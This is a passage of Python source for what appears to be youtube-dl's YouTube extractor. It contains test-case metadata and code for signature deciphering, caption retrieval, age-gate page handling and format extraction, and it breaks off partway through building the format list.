'id': 'Q39EVAstoRM',
'ext': 'mp4',
'title': 'Clash Of Clans#14 Dicas De Ataque Para CV 4',
'description': 'md5:ee18a25c350637c8faff806845bddee9',
'upload_date': '20151107',
'uploader_id': 'UCCr7TALkRbo3EtFzETQF1LA',
'uploader': 'CH GAMER DROID',
},
'params': {
'skip_download': True,
},
'skip': 'This video does not exist.',
},
{
# Video licensed under Creative Commons
'url': 'https://www.youtube.com/watch?v=M4gD1WSo5mA',
'info_dict': {
'id': 'M4gD1WSo5mA',
'ext': 'mp4',
'title': 'md5:e41008789470fc2533a3252216f1c1d1',
'description': 'md5:a677553cf0840649b731a3024aeff4cc',
'duration': 721,
'upload_date': '20150127',
'uploader_id': 'BerkmanCenter',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/BerkmanCenter',
'uploader': 'The Berkman Klein Center for Internet & Society',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
# Channel-like uploader_url
'url': 'https://www.youtube.com/watch?v=eQcmzGIKrzg',
'info_dict': {
'id': 'eQcmzGIKrzg',
'ext': 'mp4',
'title': 'Democratic Socialism and Foreign Policy | Bernie Sanders',
'description': 'md5:dda0d780d5a6e120758d1711d062a867',
'duration': 4060,
'upload_date': '20151119',
'uploader': 'Bernie Sanders',
'uploader_id': 'UCH1dpzjCEiGAt8CXkryhkZg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCH1dpzjCEiGAt8CXkryhkZg',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?feature=player_embedded&amp;v=V36LpHqtcDY',
'only_matching': True,
},
{
# YouTube Red paid video (https://github.com/ytdl-org/youtube-dl/issues/10059)
'url': 'https://www.youtube.com/watch?v=i1Ko8UG-Tdo',
'only_matching': True,
},
{
# Rental video preview
'url': 'https://www.youtube.com/watch?v=yYr8q0y5Jfg',
'info_dict': {
'id': 'uGpuVWrhIzE',
'ext': 'mp4',
'title': 'Piku - Trailer',
'description': 'md5:c36bd60c3fd6f1954086c083c72092eb',
'upload_date': '20150811',
'uploader': 'FlixMatrix',
'uploader_id': 'FlixMatrixKaravan',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/FlixMatrixKaravan',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
},
{
# YouTube Red video with episode data
'url': 'https://www.youtube.com/watch?v=iqKdEhx-dD4',
'info_dict': {
'id': 'iqKdEhx-dD4',
'ext': 'mp4',
'title': 'Isolation - Mind Field (Ep 1)',
'description': 'md5:46a29be4ceffa65b92d277b93f463c0f',
'duration': 2085,
'upload_date': '20170118',
'uploader': 'Vsauce',
'uploader_id': 'Vsauce',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/Vsauce',
'series': 'Mind Field',
'season_number': 1,
'episode_number': 1,
},
'params': {
'skip_download': True,
},
'expected_warnings': [
'Skipping DASH manifest',
],
},
{
# The following content has been identified by the YouTube community
# as inappropriate or offensive to some audiences.
'url': 'https://www.youtube.com/watch?v=6SJNVb0GnPI',
'info_dict': {
'id': '6SJNVb0GnPI',
'ext': 'mp4',
'title': 'Race Differences in Intelligence',
'description': 'md5:5d161533167390427a1f8ee89a1fc6f1',
'duration': 965,
'upload_date': '20140124',
'uploader': 'New Century Foundation',
'uploader_id': 'UCEJYpZGqgUob0zVVEaLhvVg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCEJYpZGqgUob0zVVEaLhvVg',
},
'params': {
'skip_download': True,
},
},
{
# itag 212
'url': '1t24XAntNCY',
'only_matching': True,
},
{
# geo restricted to JP
'url': 'sJL6WA-aGkQ',
'only_matching': True,
},
{
'url': 'https://www.youtube.com/watch?v=MuAGGZNfUkU&list=RDMM',
'only_matching': True,
},
{
'url': 'https://invidio.us/watch?v=BaW_jenozKc',
'only_matching': True,
},
{
# DRM protected
'url': 'https://www.youtube.com/watch?v=s7_qI6_mIXc',
'only_matching': True,
},
{
# Video with unsupported adaptive stream type formats
'url': 'https://www.youtube.com/watch?v=Z4Vy8R84T1U',
'info_dict': {
'id': 'Z4Vy8R84T1U',
'ext': 'mp4',
'title': 'saman SMAN 53 Jakarta(Sancety) opening COFFEE4th at SMAN 53 Jakarta',
'description': 'md5:d41d8cd98f00b204e9800998ecf8427e',
'duration': 433,
'upload_date': '20130923',
'uploader': 'Amelia Putri Harwita',
'uploader_id': 'UCpOxM49HJxmC1qCalXyB3_Q',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCpOxM49HJxmC1qCalXyB3_Q',
'formats': 'maxcount:10',
},
'params': {
'skip_download': True,
'youtube_include_dash_manifest': False,
},
}
]
def __init__(self, *args, **kwargs):
super(YoutubeIE, self).__init__(*args, **kwargs)
self._player_cache = {}
def report_video_info_webpage_download(self, video_id):
"""Report attempt to download video info webpage."""
self.to_screen('%s: Downloading video info webpage' % video_id)
def report_information_extraction(self, video_id):
"""Report attempt to extract video information."""
self.to_screen('%s: Extracting video information' % video_id)
def report_unavailable_format(self, video_id, format):
"""Report extracted video URL."""
self.to_screen('%s: Format %s not available' % (video_id, format))
def report_rtmp_download(self):
"""Indicate the download will use the RTMP protocol."""
self.to_screen('RTMP download detected')
def _signature_cache_id(self, example_sig):
""" Return a string representation of a signature """
return '.'.join(compat_str(len(part)) for part in example_sig.split('.'))
def _extract_signature_function(self, video_id, player_url, example_sig):
id_m = re.match(
r'.*?-(?P<id>[a-zA-Z0-9_-]+)(?:/watch_as3|/html5player(?:-new)?|(?:/[a-z]{2,3}_[A-Z]{2})?/base)?\.(?P<ext>[a-z]+)$',
player_url)
if not id_m:
raise ExtractorError('Cannot identify player %r' % player_url)
player_type = id_m.group('ext')
player_id = id_m.group('id')
# Read from filesystem cache
func_id = '%s_%s_%s' % (
player_type, player_id, self._signature_cache_id(example_sig))
assert os.path.basename(func_id) == func_id
cache_spec = self._downloader.cache.load('youtube-sigfuncs', func_id)
if cache_spec is not None:
return lambda s: ''.join(s[i] for i in cache_spec)
download_note = (
'Downloading player %s' % player_url
if self._downloader.params.get('verbose') else
'Downloading %s player %s' % (player_type, player_id)
)
if player_type == 'js':
code = self._download_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
res = self._parse_sig_js(code)
elif player_type == 'swf':
urlh = self._request_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
code = urlh.read()
res = self._parse_sig_swf(code)
else:
assert False, 'Invalid player type %r' % player_type
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = res(test_string)
cache_spec = [ord(c) for c in cache_res]
self._downloader.cache.store('youtube-sigfuncs', func_id, cache_spec)
return res
def _print_sig_code(self, func, example_sig):
def gen_sig_code(idxs):
def _genslice(start, end, step):
starts = '' if start == 0 else str(start)
ends = (':%d' % (end + step)) if end + step >= 0 else ':'
steps = '' if step == 1 else (':%d' % step)
return 's[%s%s%s]' % (starts, ends, steps)
step = None
# Quelch pyflakes warnings - start will be set when step is set
start = '(Never used)'
for i, prev in zip(idxs[1:], idxs[:-1]):
if step is not None:
if i - prev == step:
continue
yield _genslice(start, prev, step)
step = None
continue
if i - prev in [-1, 1]:
step = i - prev
start = prev
continue
else:
yield 's[%d]' % prev
if step is None:
yield 's[%d]' % i
else:
yield _genslice(start, i, step)
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = func(test_string)
cache_spec = [ord(c) for c in cache_res]
expr_code = ' + '.join(gen_sig_code(cache_spec))
signature_id_tuple = '(%s)' % (
', '.join(compat_str(len(p)) for p in example_sig.split('.')))
code = ('if tuple(len(p) for p in s.split(\'.\')) == %s:\n'
' return %s\n') % (signature_id_tuple, expr_code)
self.to_screen('Extracted signature function:\n' + code)
def _parse_sig_js(self, jscode):
funcname = self._search_regex(
(r'(["\'])signature\1\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\.sig\|\|(?P<sig>[a-zA-Z0-9$]+)\(',
r'yt\.akamaized\.net/\)\s*\|\|\s*.*?\s*c\s*&&\s*d\.set\([^,]+\s*,\s*(?:encodeURIComponent\s*\()?(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*d\.set\([^,]+\s*,\s*(?:encodeURIComponent\s*\()?\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*d\.set\([^,]+\s*,\s*\([^)]*\)\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\('),
jscode, 'Initial JS player signature function name', group='sig')
jsi = JSInterpreter(jscode)
initial_function = jsi.extract_function(funcname)
return lambda s: initial_function([s])
def _parse_sig_swf(self, file_contents):
swfi = SWFInterpreter(file_contents)
TARGET_CLASSNAME = 'SignatureDecipher'
searched_class = swfi.extract_class(TARGET_CLASSNAME)
initial_function = swfi.extract_function(searched_class, 'decipher')
return lambda s: initial_function([s])
def _decrypt_signature(self, s, video_id, player_url, age_gate=False):
"""Turn the encrypted s field into a working signature"""
if player_url is None:
raise ExtractorError('Cannot decrypt signature without player_url')
if player_url.startswith('//'):
player_url = 'https:' + player_url
elif not re.match(r'https?://', player_url):
player_url = compat_urlparse.urljoin(
'https://www.youtube.com', player_url)
try:
player_id = (player_url, self._signature_cache_id(s))
if player_id not in self._player_cache:
func = self._extract_signature_function(
video_id, player_url, s
)
self._player_cache[player_id] = func
func = self._player_cache[player_id]
if self._downloader.params.get('youtube_print_sig_code'):
self._print_sig_code(func, s)
return func(s)
except Exception as e:
tb = traceback.format_exc()
raise ExtractorError(
'Signature extraction failed: ' + tb, cause=e)
def _get_subtitles(self, video_id, webpage):
try:
subs_doc = self._download_xml(
'https://video.google.com/timedtext?hl=en&type=list&v=%s' % video_id,
video_id, note=False)
except ExtractorError as err:
self._downloader.report_warning('unable to download video subtitles: %s' % error_to_compat_str(err))
return {}
sub_lang_list = {}
for track in subs_doc.findall('track'):
lang = track.attrib['lang_code']
if lang in sub_lang_list:
continue
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': lang,
'v': video_id,
'fmt': ext,
'name': track.attrib['name'].encode('utf-8'),
})
sub_formats.append({
'url': 'https://www.youtube.com/api/timedtext?' + params,
'ext': ext,
})
sub_lang_list[lang] = sub_formats
if not sub_lang_list:
self._downloader.report_warning('video doesn\'t have subtitles')
return {}
return sub_lang_list
def _get_ytplayer_config(self, video_id, webpage):
patterns = (
# User data may contain arbitrary character sequences that may affect
# JSON extraction with regex, e.g. when '};' is contained the second
# regex won't capture the whole JSON. Yet working around by trying more
# concrete regex first keeping in mind proper quoted string handling
# to be implemented in future that will replace this workaround (see
# https://github.com/ytdl-org/youtube-dl/issues/7468,
# https://github.com/ytdl-org/youtube-dl/pull/7599)
r';ytplayer\.config\s*=\s*({.+?});ytplayer',
r';ytplayer\.config\s*=\s*({.+?});',
)
config = self._search_regex(
patterns, webpage, 'ytplayer.config', default=None)
if config:
return self._parse_json(
uppercase_escape(config), video_id, fatal=False)
def _get_automatic_captions(self, video_id, webpage):
"""We need the webpage for getting the captions url, pass it as an
argument to speed up the process."""
self.to_screen('%s: Looking for automatic captions' % video_id)
player_config = self._get_ytplayer_config(video_id, webpage)
err_msg = 'Couldn\'t find automatic captions for %s' % video_id
if not player_config:
self._downloader.report_warning(err_msg)
return {}
try:
args = player_config['args']
caption_url = args.get('ttsurl')
if caption_url:
timestamp = args['timestamp']
# We get the available subtitles
list_params = compat_urllib_parse_urlencode({
'type': 'list',
'tlangs': 1,
'asrs': 1,
})
list_url = caption_url + '&' + list_params
caption_list = self._download_xml(list_url, video_id)
original_lang_node = caption_list.find('track')
if original_lang_node is None:
self._downloader.report_warning('Video doesn\'t have automatic captions')
return {}
original_lang = original_lang_node.attrib['lang_code']
caption_kind = original_lang_node.attrib.get('kind', '')
sub_lang_list = {}
for lang_node in caption_list.findall('target'):
sub_lang = lang_node.attrib['lang_code']
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': original_lang,
'tlang': sub_lang,
'fmt': ext,
'ts': timestamp,
'kind': caption_kind,
})
sub_formats.append({
'url': caption_url + '&' + params,
'ext': ext,
})
sub_lang_list[sub_lang] = sub_formats
return sub_lang_list
def make_captions(sub_url, sub_langs):
parsed_sub_url = compat_urllib_parse_urlparse(sub_url)
caption_qs = compat_parse_qs(parsed_sub_url.query)
captions = {}
for sub_lang in sub_langs:
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
caption_qs.update({
'tlang': [sub_lang],
'fmt': [ext],
})
sub_url = compat_urlparse.urlunparse(parsed_sub_url._replace(
query=compat_urllib_parse_urlencode(caption_qs, True)))
sub_formats.append({
'url': sub_url,
'ext': ext,
})
captions[sub_lang] = sub_formats
return captions
# New captions format as of 22.06.2017
player_response = args.get('player_response')
if player_response and isinstance(player_response, compat_str):
player_response = self._parse_json(
player_response, video_id, fatal=False)
if player_response:
renderer = player_response['captions']['playerCaptionsTracklistRenderer']
base_url = renderer['captionTracks'][0]['baseUrl']
sub_lang_list = []
for lang in renderer['translationLanguages']:
lang_code = lang.get('languageCode')
if lang_code:
sub_lang_list.append(lang_code)
return make_captions(base_url, sub_lang_list)
# Some videos don't provide ttsurl but rather caption_tracks and
# caption_translation_languages (e.g. 20LmZk1hakA)
# Does not used anymore as of 22.06.2017
caption_tracks = args['caption_tracks']
caption_translation_languages = args['caption_translation_languages']
caption_url = compat_parse_qs(caption_tracks.split(',')[0])['u'][0]
sub_lang_list = []
for lang in caption_translation_languages.split(','):
lang_qs = compat_parse_qs(compat_urllib_parse_unquote_plus(lang))
sub_lang = lang_qs.get('lc', [None])[0]
if sub_lang:
sub_lang_list.append(sub_lang)
return make_captions(caption_url, sub_lang_list)
# An extractor error can be raise by the download process if there are
# no automatic captions but there are subtitles
except (KeyError, IndexError, ExtractorError):
self._downloader.report_warning(err_msg)
return {}
def _mark_watched(self, video_id, video_info, player_response):
playback_url = url_or_none(try_get(
player_response,
lambda x: x['playbackTracking']['videostatsPlaybackUrl']['baseUrl']) or try_get(
video_info, lambda x: x['videostats_playback_base_url'][0]))
if not playback_url:
return
parsed_playback_url = compat_urlparse.urlparse(playback_url)
qs = compat_urlparse.parse_qs(parsed_playback_url.query)
# cpn generation algorithm is reverse engineered from base.js.
# In fact it works even with dummy cpn.
CPN_ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_'
cpn = ''.join((CPN_ALPHABET[random.randint(0, 256) & 63] for _ in range(0, 16)))
qs.update({
'ver': ['2'],
'cpn': [cpn],
})
playback_url = compat_urlparse.urlunparse(
parsed_playback_url._replace(query=compat_urllib_parse_urlencode(qs, True)))
self._download_webpage(
playback_url, video_id, 'Marking watched',
'Unable to mark watched', fatal=False)
@staticmethod
def _extract_urls(webpage):
# Embedded YouTube player
entries = [
unescapeHTML(mobj.group('url'))
for mobj in re.finditer(r'''(?x)
(?:
<iframe[^>]+?src=|
data-video-url=|
<embed[^>]+?src=|
embedSWF\(?:\s*|
<object[^>]+data=|
new\s+SWFObject\(
)
(["\'])
(?P<url>(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/
(?:embed|v|p)/[0-9A-Za-z_-]{11}.*?)
\1''', webpage)]
# lazyYT YouTube embed
entries.extend(list(map(
unescapeHTML,
re.findall(r'class="lazyYT" data-youtube-id="([^"]+)"', webpage))))
# Wordpress "YouTube Video Importer" plugin
matches = re.findall(r'''(?x)<div[^>]+
class=(?P<q1>[\'"])[^\'"]*\byvii_single_video_player\b[^\'"]*(?P=q1)[^>]+
data-video_id=(?P<q2>[\'"])([^\'"]+)(?P=q2)''', webpage)
entries.extend(m[-1] for m in matches)
return entries
@staticmethod
def _extract_url(webpage):
urls = YoutubeIE._extract_urls(webpage)
return urls[0] if urls else None
@classmethod
def extract_id(cls, url):
mobj = re.match(cls._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
video_id = mobj.group(2)
return video_id
def _extract_annotations(self, video_id):
url = 'https://www.youtube.com/annotations_invideo?features=1&legacy=1&video_id=%s' % video_id
return self._download_webpage(url, video_id, note='Searching for annotations.', errnote='Unable to download video annotations.')
@staticmethod
def _extract_chapters(description, duration):
if not description:
return None
chapter_lines = re.findall(
r'(?:^|<br\s*/>)([^<]*<a[^>]+onclick=["\']yt\.www\.watch\.player\.seekTo[^>]+>(\d{1,2}:\d{1,2}(?::\d{1,2})?)</a>[^>]*)(?=$|<br\s*/>)',
description)
if not chapter_lines:
return None
chapters = []
for next_num, (chapter_line, time_point) in enumerate(
chapter_lines, start=1):
start_time = parse_duration(time_point)
if start_time is None:
continue
if start_time > duration:
break
end_time = (duration if next_num == len(chapter_lines)
else parse_duration(chapter_lines[next_num][1]))
if end_time is None:
continue
if end_time > duration:
end_time = duration
if start_time > end_time:
break
chapter_title = re.sub(
r'<a[^>]+>[^<]+</a>', '', chapter_line).strip(' \t-')
chapter_title = re.sub(r'\s+', ' ', chapter_title)
chapters.append({
'start_time': start_time,
'end_time': end_time,
'title': chapter_title,
})
return chapters
def _real_extract(self, url):
url, smuggled_data = unsmuggle_url(url, {})
proto = (
'http' if self._downloader.params.get('prefer_insecure', False)
else 'https')
start_time = None
end_time = None
parsed_url = compat_urllib_parse_urlparse(url)
for component in [parsed_url.fragment, parsed_url.query]:
query = compat_parse_qs(component)
if start_time is None and 't' in query:
start_time = parse_duration(query['t'][0])
if start_time is None and 'start' in query:
start_time = parse_duration(query['start'][0])
if end_time is None and 'end' in query:
end_time = parse_duration(query['end'][0])
# Extract original video URL from URL with redirection, like age verification, using next_url parameter
mobj = re.search(self._NEXT_URL_RE, url)
if mobj:
url = proto + '://www.youtube.com/' + compat_urllib_parse_unquote(mobj.group(1)).lstrip('/')
video_id = self.extract_id(url)
# Get video webpage
url = proto + '://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999' % video_id
video_webpage = self._download_webpage(url, video_id)
# Attempt to extract SWF player URL
mobj = re.search(r'swfConfig.*?"(https?:\\/\\/.*?watch.*?-.*?\.swf)"', video_webpage)
if mobj is not None:
player_url = re.sub(r'\\(.)', r'\1', mobj.group(1))
else:
player_url = None
dash_mpds = []
def add_dash_mpd(video_info):
dash_mpd = video_info.get('dashmpd')
if dash_mpd and dash_mpd[0] not in dash_mpds:
dash_mpds.append(dash_mpd[0])
def add_dash_mpd_pr(pl_response):
dash_mpd = url_or_none(try_get(
pl_response, lambda x: x['streamingData']['dashManifestUrl'],
compat_str))
if dash_mpd and dash_mpd not in dash_mpds:
dash_mpds.append(dash_mpd)
is_live = None
view_count = None
def extract_view_count(v_info):
return int_or_none(try_get(v_info, lambda x: x['view_count'][0]))
player_response = {}
# Get video info
embed_webpage = None
if re.search(r'player-age-gate-content">', video_webpage) is not None:
age_gate = True
# We simulate the access to the video from www.youtube.com/v/{video_id}
# this can be viewed without login into Youtube
url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(url, video_id, 'Downloading embed webpage')
data = compat_urllib_parse_urlencode({
'video_id': video_id,
'eurl': 'https://youtube.googleapis.com/v/' + video_id,
'sts': self._search_regex(
r'"sts"\s*:\s*(\d+)', embed_webpage, 'sts', default=''),
})
video_info_url = proto + '://www.youtube.com/get_video_info?' + data
video_info_webpage = self._download_webpage(
video_info_url, video_id,
note='Refetching age-gated info webpage',
errnote='unable to download video info webpage')
video_info = compat_parse_qs(video_info_webpage)
add_dash_mpd(video_info)
else:
age_gate = False
video_info = None
sts = None
# Try looking directly into the video webpage
ytplayer_config = self._get_ytplayer_config(video_id, video_webpage)
if ytplayer_config:
args = ytplayer_config['args']
if args.get('url_encoded_fmt_stream_map') or args.get('hlsvp'):
# Convert to the same format returned by compat_parse_qs
video_info = dict((k, [v]) for k, v in args.items())
add_dash_mpd(video_info)
# Rental video is not rented but preview is available (e.g.
# https://www.youtube.com/watch?v=yYr8q0y5Jfg,
# https://github.com/ytdl-org/youtube-dl/issues/10532)
if not video_info and args.get('ypc_vid'):
return self.url_result(
args['ypc_vid'], YoutubeIE.ie_key(), video_id=args['ypc_vid'])
if args.get('livestream') == '1' or args.get('live_playback') == 1:
is_live = True
sts = ytplayer_config.get('sts')
if not player_response:
pl_response = str_or_none(args.get('player_response'))
if pl_response:
pl_response = self._parse_json(pl_response, video_id, fatal=False)
if isinstance(pl_response, dict):
player_response = pl_response
if not video_info or self._downloader.params.get('youtube_include_dash_manifest', True):
add_dash_mpd_pr(player_response)
# We also try looking in get_video_info since it may contain different dashmpd
# URL that points to a DASH manifest with possibly different itag set (some itags
# are missing from DASH manifest pointed by webpage's dashmpd, some - from DASH
# manifest pointed by get_video_info's dashmpd).
# The general idea is to take a union of itags of both DASH manifests (for example
# video with such 'manifest behavior' see https://github.com/ytdl-org/youtube-dl/issues/6093)
self.report_video_info_webpage_download(video_id)
for el in ('info', 'embedded', 'detailpage', 'vevo', ''):
query = {
'video_id': video_id,
'ps': 'default',
'eurl': '',
'gl': 'US',
'hl': 'en',
}
if el:
query['el'] = el
if sts:
query['sts'] = sts
video_info_webpage = self._download_webpage(
'%s://www.youtube.com/get_video_info' % proto,
video_id, note=False,
errnote='unable to download video info webpage',
fatal=False, query=query)
if not video_info_webpage:
continue
get_video_info = compat_parse_qs(video_info_webpage)
if not player_response:
pl_response = get_video_info.get('player_response', [None])[0]
if isinstance(pl_response, dict):
player_response = pl_response
add_dash_mpd_pr(player_response)
add_dash_mpd(get_video_info)
if view_count is None:
view_count = extract_view_count(get_video_info)
if not video_info:
video_info = get_video_info
if 'token' in get_video_info:
# Different get_video_info requests may report different results, e.g.
# some may report video unavailability, but some may serve it without
# any complaint (see https://github.com/ytdl-org/youtube-dl/issues/7362,
# the original webpage as well as el=info and el=embedded get_video_info
# requests report video unavailability due to geo restriction while
# el=detailpage succeeds and returns valid data). This is probably
# due to YouTube measures against IP ranges of hosting providers.
# Working around by preferring the first succeeded video_info containing
# the token if no such video_info yet was found.
if 'token' not in video_info:
video_info = get_video_info
break
def extract_unavailable_message():
return self._html_search_regex(
r'(?s)<h1[^>]+id="unavailable-message"[^>]*>(.+?)</h1>',
video_webpage, 'unavailable message', default=None)
if 'token' not in video_info:
if 'reason' in video_info:
if 'The uploader has not made this video available in your country.' in video_info['reason']:
regions_allowed = self._html_search_meta(
'regionsAllowed', video_webpage, default=None)
countries = regions_allowed.split(',') if regions_allowed else None
self.raise_geo_restricted(
msg=video_info['reason'][0], countries=countries)
reason = video_info['reason'][0]
if 'Invalid parameters' in reason:
unavailable_message = extract_unavailable_message()
if unavailable_message:
reason = unavailable_message
raise ExtractorError(
'YouTube said: %s' % reason,
expected=True, video_id=video_id)
else:
raise ExtractorError(
'"token" parameter not in video info for unknown reason',
video_id=video_id)
if video_info.get('license_info'):
raise ExtractorError('This video is DRM protected.', expected=True)
video_details = try_get(
player_response, lambda x: x['videoDetails'], dict) or {}
# title
if 'title' in video_info:
video_title = video_info['title'][0]
elif 'title' in player_response:
video_title = video_details['title']
else:
self._downloader.report_warning('Unable to extract video title')
video_title = '_'
# description
description_original = video_description = get_element_by_id("eow-description", video_webpage)
if video_description:
def replace_url(m):
redir_url = compat_urlparse.urljoin(url, m.group(1))
parsed_redir_url = compat_urllib_parse_urlparse(redir_url)
if re.search(r'^(?:www\.)?(?:youtube(?:-nocookie)?\.com|youtu\.be)$', parsed_redir_url.netloc) and parsed_redir_url.path == '/redirect':
qs = compat_parse_qs(parsed_redir_url.query)
q = qs.get('q')
if q and q[0]:
return q[0]
return redir_url
description_original = video_description = re.sub(r'''(?x)
<a\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
(?:title|href)="([^"]+)"\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
class="[^"]*"[^>]*>
[^<]+\.{3}\s*
</a>
''', replace_url, video_description)
video_description = clean_html(video_description)
else:
fd_mobj = re.search(r'<meta name="description" content="([^"]+)"', video_webpage)
if fd_mobj:
video_description = unescapeHTML(fd_mobj.group(1))
else:
video_description = ''
if not smuggled_data.get('force_singlefeed', False):
if not self._downloader.params.get('noplaylist'):
multifeed_metadata_list = try_get(
player_response,
lambda x: x['multicamera']['playerLegacyMulticameraRenderer']['metadataList'],
compat_str) or try_get(
video_info, lambda x: x['multifeed_metadata_list'][0], compat_str)
if multifeed_metadata_list:
entries = []
feed_ids = []
for feed in multifeed_metadata_list.split(','):
# Unquote should take place before split on comma (,) since textual
# fields may contain comma as well (see
# https://github.com/ytdl-org/youtube-dl/issues/8536)
feed_data = compat_parse_qs(compat_urllib_parse_unquote_plus(feed))
entries.append({
'_type': 'url_transparent',
'ie_key': 'Youtube',
'url': smuggle_url(
'%s://www.youtube.com/watch?v=%s' % (proto, feed_data['id'][0]),
{'force_singlefeed': True}),
'title': '%s (%s)' % (video_title, feed_data['title'][0]),
})
feed_ids.append(feed_data['id'][0])
self.to_screen(
'Downloading multifeed video (%s) - add --no-playlist to just download video %s'
% (', '.join(feed_ids), video_id))
return self.playlist_result(entries, video_id, video_title, video_description)
else:
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
if view_count is None:
view_count = extract_view_count(video_info)
if view_count is None and video_details:
view_count = int_or_none(video_details.get('viewCount'))
# Check for "rental" videos
if 'ypc_video_rental_bar_text' in video_info and 'author' not in video_info:
raise ExtractorError('"rental" videos not supported. See https://github.com/ytdl-org/youtube-dl/issues/359 for more information.', expected=True)
def _extract_filesize(media_url):
return int_or_none(self._search_regex(
r'\bclen[=/](\d+)', media_url, 'filesize', default=None))
if 'conn' in video_info and video_info['conn'][0].startswith('rtmp'):
self.report_rtmp_download()
formats = [{
'format_id': '_rtmp',
'protocol': 'rtmp',
'url': video_info['conn'][0],
'player_url': player_url,
}]
elif not is_live and (len(video_info.get('url_encoded_fmt_stream_map', [''])[0]) >= 1 or len(video_info.get('adaptive_fmts', [''])[0]) >= 1):
encoded_url_map = video_info.get('url_encoded_fmt_stream_map', [''])[0] + ',' + video_info.get('adaptive_fmts', [''])[0]
if 'rtmpe%3Dyes' in encoded_url_map:
raise ExtractorError('rtmpe downloads are not supported, see https://github.com/ytdl-org/youtube-dl/issues/343 for more information.', expected=True)
formats_spec = {}
fmt_list = video_info.get('fmt_list', [''])[0]
if fmt_list:
for fmt in fmt_list.split(','):
spec = fmt.split('/')
if len(spec) > 1:
width_height = spec[1].split('x')
if len(width_height) == 2:
formats_spec[spec[0]] = {
'resolution': spec[1],
'width': int_or_none(width_height[0]),
'height': int_or_none(width_height[1]),
}
q = qualities(['small', 'medium', 'hd720'])
streaming_formats = try_get(player_response, lambda x: x['streamingData']['formats'], list)
if streaming_formats:
for fmt in streaming_formats:
itag = str_or_none(fmt.get('itag'))
if not itag:
continue
quality = fmt.get('quality')
quality_label = fmt.get('qualityLabel') or quality
formats_spec[itag] = {
'asr': int_or_none(fmt.get('audioSampleRate')),
'filesize': int_or_none(fmt.get('contentLength')),
'format_note': quality_label,
'fps': int_or_none(fmt.get('fps')),
'height': int_or_none(fmt.get('height')),
'quality': q(quality),
# bitrate for itag 43 is always 2147483647
'tbr': float_or_none(fmt.get('averageBitrate') or fmt.get('bitrate'), 1000) if itag != '43' else None,
'width': int_or_none(fmt.get('width')),
}
formats = []
for url_data_str in encoded_url_map.split(','):
url_data = compat_parse_qs(url_data_str)
if 'itag' not in url_data or 'url' not in url_data:
continue
stream_type = int_or_none(try_get(url_data, lambda x: x['stream_type'][0]))
# Unsupported FORMAT_STREAM_TYPE_OTF
if stream_type == 3:
continue
format_id = url_data['itag'][0]
url = url_data['url'][0]
if 's' in url_data or self._downloader.params.get('youtube_include_dash_manifest', True):
ASSETS_RE = r'"assets":.+?"js":\s*("[^"]+")'
jsplayer_url_json = self._search_regex(
ASSETS_RE,
embed_webpage if age_gate else video_webpage,
'JS player URL (1)', default=None)
if not jsplayer_url_json and not age_gate:
# We need the embed website after all
if embed_webpage is None:
embed_url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(
embed_url, video_id, 'Downloading embed webpage')
jsplayer_url_json = self._search_regex(
ASSETS_RE, embed_webpage, 'JS player URL')
player_url = json.loads(jsplayer_url_json)
if player_url is None:
player_url_json = self._search_regex(
r'ytplayer\.config.*?"url"\s*:\s*("[^"]+")',
video_webpage, 'age gate player URL')
player_url = json.loads(player_url_json)
if 'sig' in url_data:
url += '&signature=' + url_data['sig'][0]
elif 's' in url_data:
encrypted_sig = url_data['s'][0]
if self._downloader.params.get('verbose'):
if player_url is None:
player_version = 'unknown'
player_desc = 'unknown'
else:
if player_url.endswith('swf'):
player_version = self._search_regex(
r'-(.+?)(?:/watch_as3)?\.swf$', player_url,
'flash player', fatal=False)
player_desc = 'flash player %s' % player_version
else:
player_version = self._search_regex(
[r'html5player-([^/]+?)(?:/html5player(?:-new)?)?\.js',
r'(?:www|player(?:_ias)?)-([^/]+)(?:/[a-z]{2,3}_[A-Z]{2})?/base\.js'],
player_url,
'html5 player', fatal=False)
player_desc = 'html5 player %s' % player_version
parts_sizes = self._signature_cache_id(encrypted_sig)
self.to_screen('{%s} signature length %s, %s' %
(format_id, parts_sizes, player_desc))
signature = self._decrypt_signature(
encrypted_sig, video_id, player_url, age_gate)
url += '&signature=' + signature
if 'ratebypass' not in url:
url += '&ratebypass=yes'
dct = {
'format_id': format_id,
'url': url,
'player_url': player_url,
}
if format_id in self._formats:
dct.update(self._formats[format_id])
if format_id in formats_spec:
dct.update(formats_spec[format_id])
# Some itags are not included in DASH manifest thus corresponding formats will
# lack metadata (see https://github.com/ytdl-org/youtube-dl/pull/5993).
